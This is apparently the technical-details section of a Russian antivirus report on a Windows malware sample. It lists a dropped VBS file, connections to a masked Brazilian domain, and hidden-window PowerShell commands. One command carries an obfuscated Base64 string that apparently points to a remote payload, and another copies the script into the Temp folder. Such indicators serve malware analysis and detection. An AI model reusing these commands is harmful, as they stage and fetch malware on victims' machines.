Техническая информация
- %WINDIR%\temp\regasm.vbs
- 'up#####eimagens.com.br':443
- 'up#####eimagens.com.br':443
- DNS ASK up#####eimagens.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden if (-not (Get-ChildItem %WINDIR%\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\Regasm.vbs -Force }' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden if (-not (Get-ChildItem %WINDIR%\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\Regasm.vbs -Force }